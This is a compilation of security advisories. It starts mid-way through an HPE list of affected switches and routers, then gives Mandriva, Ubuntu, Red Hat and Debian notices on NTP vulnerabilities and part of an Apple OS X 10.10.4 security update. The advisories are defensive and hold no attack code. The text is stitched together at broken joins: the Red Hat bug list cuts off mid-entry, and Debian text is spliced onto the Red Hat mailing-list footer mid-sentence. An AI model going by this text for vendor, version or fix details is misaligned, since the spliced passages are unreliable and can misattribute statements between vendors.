- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA w/Comware v7 OS MPU
-
12900 (Comware 7) - Version: Fix in R1137
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
-
5900 (Comware 7) - Version: Fix in R2422P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- JG296A HP 5920AF-24XG Switch
- JG555A HP 5920AF-24XG TAA Switch
-
MSR1000 (Comware 7) - Version: Fix in R0106P33
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
-
MSR2000 (Comware 7) - Version: Fix in R0106P33
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
-
MSR3000 (Comware 7) - Version: Fix in R0106P33
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
-
MSR4000 (Comware 7) - Version: Fix in R0106P33
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
-
5800 (Comware 7) - Version: Fix in R7006P15
- HP Network Products
- JC099A HP 5800-24G-PoE Switch
- JC099B HP 5800-24G-PoE+ Switch
- JC100A HP 5800-24G Switch
- JC100B HP 5800-24G Switch
- JC101A HP 5800-48G Switch with 2 Slots
- JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots
- JC103A HP 5800-24G-SFP Switch
- JC103B HP 5800-24G-SFP Switch with 1 Interface Slot
- JC104A HP 5800-48G-PoE Switch
- JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot
- JC105A HP 5800-48G Switch
- JC105B HP 5800-48G Switch with 1 Interface Slot
- JG254A HP 5800-24G-PoE+ TAA-compliant Switch
- JG254B HP 5800-24G-PoE+ TAA-compliant Switch
- JG255A HP 5800-24G TAA-compliant Switch
- JG255B HP 5800-24G TAA-compliant Switch
- JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface
- JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface
- JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface
- JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface
- JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG225A HP 5800AF-48G Switch
- JG225B HP 5800AF-48G Switch
- JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG243A HP 5820-24XG-SFP+ TAA-compliant Switch
- JG243B HP 5820-24XG-SFP+ TAA-compliant Switch
- JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot
- JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot
- JC106A HP 5820-14XG-SFP+ Switch with 2 Slots
- JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot
- JG219A HP 5820AF-24XG Switch
- JG219B HP 5820AF-24XG Switch
- JC102A HP 5820-24XG-SFP+ Switch
- JC102B HP 5820-24XG-SFP+ Switch
-
VSR (Comware 7) - Version: Fix in E0321
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
-
7900 (Comware 7) - Version: Fix in R2137
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
-
5130 (Comware 7) - Version: Fix in R3109P05
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
-
5700 (Comware 7) - Version: Fix in R2422P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
-
5930 (Comware 7) - Version: Fix in R2422P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
HISTORY Version:1 (rev.1) - 8 March 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799 http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities
Updated Packages:
Mandriva Business Server 1/X86_64: b0f98e6b8700e3e3413582fe28d1ba06 mbs1/x86_64/ntp-4.2.6p5-8.4.mbs1.x86_64.rpm d864780718c95368bf9ec81643e35e5d mbs1/x86_64/ntp-client-4.2.6p5-8.4.mbs1.x86_64.rpm 6f457df52d46fb8e6b0fe44aead752eb mbs1/x86_64/ntp-doc-4.2.6p5-8.4.mbs1.x86_64.rpm b4bff3de733ea6d2839a77a9211ce02b mbs1/SRPMS/ntp-4.2.6p5-8.4.mbs1.src.rpm
Mandriva Business Server 2/X86_64: e9ac2f3465bcc50199aef8a4d553927f mbs2/x86_64/ntp-4.2.6p5-16.3.mbs2.x86_64.rpm cf2970c3c56efbfa84f964532ad64544 mbs2/x86_64/ntp-client-4.2.6p5-16.3.mbs2.x86_64.rpm 1ae1b1d3c2e7bdea25c01c33652b6169 mbs2/x86_64/ntp-doc-4.2.6p5-16.3.mbs2.noarch.rpm d250433009fd187361bda6338dc5eede mbs2/SRPMS/ntp-4.2.6p5-16.3.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. ============================================================================ Ubuntu Security Notice USN-2567-1 April 13, 2015
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. This issue could either cause ntp-keygen to hang, or could result in non-random keys. (CVE number pending)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.3
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.3
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.4
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ntp security, bug fix, and enhancement update Advisory ID: RHSA-2015:2231-04 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html Issue date: 2015-11-19 CVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 CVE-2015-3405 =====================================================================
- Summary:
Updated ntp packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.
It was found that because NTP's access control was based on a source IP address, an attacker could bypass source IP restrictions and send malicious control and configuration packets by spoofing ::1 addresses. (CVE-2014-9298, CVE-2014-9751)
A denial of service flaw was found in the way NTP hosts that were peering with each other authenticated themselves before updating their internal state variables. An attacker could send packets to one peer host, which could cascade to other peers, and stop the synchronization process among the reached peers. (CVE-2015-1799)
A flaw was found in the way the ntp-keygen utility generated MD5 symmetric keys on big-endian systems. An attacker could possibly use this flaw to guess generated MD5 keys, which could then be used to spoof an NTP client or server. (CVE-2015-3405)
A stack-based buffer overflow was found in the way the NTP autokey protocol was implemented. When an NTP client decrypted a secret received from an NTP server, it could cause that client to crash. (CVE-2014-9297, CVE-2014-9750)
It was found that ntpd did not check whether a Message Authentication Code (MAC) was present in a received packet when ntpd was configured to use symmetric cryptographic keys. A man-in-the-middle attacker could use this flaw to send crafted packets that would be accepted by a client or a peer without the attacker knowing the symmetric key. (CVE-2015-1798)
The CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav Lichvár of Red Hat.
Bug fixes:
-
The ntpd service truncated symmetric keys specified in the key file to 20 bytes. As a consequence, it was impossible to configure NTP authentication to work with peers that use longer keys. With this update, the maximum key length has been changed to 32 bytes. (BZ#1191111)
-
The ntpd service could previously join multicast groups only when starting, which caused problems if ntpd was started during system boot before network was configured. With this update, ntpd attempts to join multicast groups every time network configuration is changed. (BZ#1207014)
-
Previously, the ntp-keygen utility used the exponent of 3 when generating RSA keys. Consequently, generating RSA keys failed when FIPS mode was enabled. With this update, ntp-keygen has been modified to use the exponent of 65537, and generating keys in FIPS mode now works as expected. (BZ#1191116)
-
The ntpd service dropped incoming NTP packets if their source port was lower than 123 (the NTP port). With this update, ntpd no longer checks the source port number, and clients behind NAT are now able to correctly synchronize with the server. (BZ#1171640)
Enhancements:
-
This update adds support for configurable Differentiated Services Code Points (DSCP) in NTP packets, simplifying configuration in large networks where different NTP implementations or versions are using different DSCP values. (BZ#1202828)
-
This update adds the ability to configure separate clock stepping thresholds for each direction (backward and forward). Use the "stepback" and "stepfwd" options to configure each threshold. (BZ#1193154)
-
Support for nanosecond resolution has been added to the Structural Health Monitoring (SHM) reference clock. Prior to this update, when a Precision Time Protocol (PTP) hardware clock was used as a time source to synchronize the system clock, the accuracy of the synchronization was limited due to the microsecond resolution of the SHM protocol. The nanosecond extension in the SHM protocol now allows sub-microsecond synchronization of the system clock. (BZ#1117702)
All ntp users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1117702 - SHM refclock doesn't support nanosecond resolution 1122012 - SHM refclock allows only two units with owner-only access 1171640 - NTP drops requests when sourceport is below 123 1180721 - ntp: mreadvar command crash in ntpq 1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1 1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated 1191108 - ntpd should warn when monitoring facility can't be disabled due to restrict configuration 1191122 - ntpd -x steps clock on leap second 1193154 - permit differential fwd/back threshold for step vs. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
aarch64: ntp-4.2.6p5-22.el7.aarch64.rpm ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm ntpdate-4.2.6p5-22.el7.aarch64.rpm
ppc64: ntp-4.2.6p5-22.el7.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm ntpdate-4.2.6p5-22.el7.ppc64.rpm
ppc64le: ntp-4.2.6p5-22.el7.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm ntpdate-4.2.6p5-22.el7.ppc64le.rpm
s390x: ntp-4.2.6p5-22.el7.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm ntpdate-4.2.6p5-22.el7.s390x.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm sntp-4.2.6p5-22.el7.aarch64.rpm
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm sntp-4.2.6p5-22.el7.ppc64.rpm
ppc64le: ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm sntp-4.2.6p5-22.el7.ppc64le.rpm
s390x: ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm sntp-4.2.6p5-22.el7.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-9297 https://access.redhat.com/security/cve/CVE-2014-9298 https://access.redhat.com/security/cve/CVE-2014-9750 https://access.redhat.com/security/cve/CVE-2014-9751 https://access.redhat.com/security/cve/CVE-2015-1798 https://access.redhat.com/security/cve/CVE-2015-1799 https://access.redhat.com/security/cve/CVE-2015-3405 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3 1hLTu5I/PUzWOnD8rRIlZQ== =sWdG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. This could allow a remote attacker to cause a denial of service by impeding synchronization between NTP peers.
Additionally, it was discovered that generating MD5 keys using ntp-keygen on big endian machines would either trigger an endless loop, or generate non-random keys.
For the stable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u4.
For the unstable distribution (sid), these problems have been fixed in version 1:4.2.6.p5+dfsg-7.
We recommend that you upgrade your ntp packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005
OS X Yosemite v10.10.4 and Security Update 2015-005 are now available and address the following:
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A process may gain admin privileges without proper authentication Description: An issue existed when checking XPC entitlements. This issue was addressed through improved entitlement checking. CVE-ID CVE-2015-3671 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A non-admin user may obtain admin rights Description: An issue existed in the handling of user authentication. This issue was addressed through improved error checking. CVE-ID CVE-2015-3672 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may abuse Directory Utility to gain root privileges Description: Directory Utility was able to be moved and modified to achieve code execution within an entitled process. This issue was addressed by limiting the disk location that writeconfig clients may be executed from. CVE-ID CVE-2015-3673 : Patrick Wardle of Synack, Emil Kvarnhammar at TrueSec
afpserver Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the AFP server. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3674 : Dean Jerkovich of NCC Group
apache Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may be able to access directories that are protected with HTTP authentication without knowing the correct credentials Description: The default Apache configuration did not include mod_hfs_apple. If Apache was manually enabled and the configuration was not changed, some files that should not be accessible might have been accessible using a specially crafted URL. This issue was addressed by enabling mod_hfs_apple. CVE-ID CVE-2015-3675 : Apple
apache Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities exist in PHP, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.24 and 5.4.40. These were addressed by updating PHP to versions 5.5.24 and 5.4.40. CVE-ID CVE-2015-0235 CVE-2015-0273
AppleGraphicsControl Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in AppleGraphicsControl which could have led to the disclosure of kernel memory layout. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3676 : Chen Liang of KEEN Team
AppleFSCompression Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in LZVN compression that could have led to the disclosure of kernel memory content. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3677 : an anonymous researcher working with HP's Zero Day Initiative
AppleThunderboltEDMService Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the handling of certain Thunderbolt commands from local processes. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3678 : Apple
ATS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in handling of certain fonts. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3679 : Pawel Wylecial working with HP's Zero Day Initiative CVE-2015-3680 : Pawel Wylecial working with HP's Zero Day Initiative CVE-2015-3681 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3682 : Nuode Wei
Bluetooth Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the Bluetooth HCI interface. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3683 : Roberto Paleari and Aristide Fattori of Emaze Networks
Certificate Trust Policy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may be able to intercept network traffic Description: An intermediate certificate was incorrectly issued by the certificate authority CNNIC. This issue was addressed through the addition of a mechanism to trust only a subset of certificates issued prior to the mis-issuance of the intermediate. Further details are available at https://support.apple.com/en-us/HT204938
Certificate Trust Policy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858.
CFNetwork HTTPAuthentication Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Following a maliciously crafted URL may lead to arbitrary code execution Description: A memory corruption issue existed in handling of certain URL credentials. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3684 : Apple
CoreText Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted text file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the processing of text files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-1157 CVE-2015-3685 : Apple CVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3689 : Apple
coreTLS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may intercept SSL/TLS connections Description: coreTLS accepted short ephemeral Diffie-Hellman (DH) keys, as used in export-strength ephemeral DH cipher suites. This issue, also known as Logjam, allowed an attacker with a privileged network position to downgrade security to 512-bit DH if the server supported an export-strength ephemeral DH cipher suite. The issue was addressed by increasing the default minimum size allowed for DH ephemeral keys to 768 bits. CVE-ID CVE-2015-4000 : The weakdh team at weakdh.org, Hanno Boeck
DiskImages Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An information disclosure issue existed in the processing of disk images. This issue was addressed through improved memory management. CVE-ID CVE-2015-3690 : Peter Rutenbar working with HP's Zero Day Initiative
Display Drivers Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An issue existed in the Monitor Control Command Set kernel extension by which a userland process could control the value of a function pointer within the kernel. The issue was addressed by removing the affected interface. CVE-ID CVE-2015-3691 : Roberto Paleari and Aristide Fattori of Emaze Networks
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application with root privileges may be able to modify EFI flash memory Description: An insufficient locking issue existed with EFI flash when resuming from sleep states. This issue was addressed through improved locking. CVE-ID CVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah and Corey Kallenberg of LegbaCore LLC, Pedro Vilaca
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may induce memory corruption to escalate privileges Description: A disturbance error, also known as Rowhammer, exists with some DDR3 RAM that could have led to memory corruption. This issue was mitigated by increasing memory refresh rates. CVE-ID CVE-2015-3693 : Mark Seaborn and Thomas Dullien of Google, working from original research by Yoongu Kim et al (2014)
FontParser Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3694 : John Villamil (@day6reak), Yahoo Pentest Team
Graphics Driver Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An out of bounds write issue existed in NVIDIA graphics driver. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3712 : Ian Beer of Google Project Zero
Intel Graphics Driver Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple buffer overflow issues exist in the Intel graphics driver, the most serious of which may lead to arbitrary code execution with system privileges Description: Multiple buffer overflow issues existed in the Intel graphics driver. These were addressed through additional bounds checks. CVE-ID CVE-2015-3695 : Ian Beer of Google Project Zero CVE-2015-3696 : Ian Beer of Google Project Zero CVE-2015-3697 : Ian Beer of Google Project Zero CVE-2015-3698 : Ian Beer of Google Project Zero CVE-2015-3699 : Ian Beer of Google Project Zero CVE-2015-3700 : Ian Beer of Google Project Zero CVE-2015-3701 : Ian Beer of Google Project Zero CVE-2015-3702 : KEEN Team
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities existed in libtiff, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libtiff versions prior to 4.0.4. They were addressed by updating libtiff to version 4.0.4. CVE-ID CVE-2014-8127 CVE-2014-8128 CVE-2014-8129 CVE-2014-8130
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted .tiff file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of .tiff files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3703 : Apple
Install Framework Legacy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Several issues existed in how Install.framework's 'runner' setuid binary dropped privileges. This was addressed by properly dropping privileges. CVE-ID CVE-2015-3704 : Ian Beer of Google Project Zero
IOAcceleratorFamily Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOAcceleratorFamily. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3705 : KEEN Team CVE-2015-3706 : KEEN Team
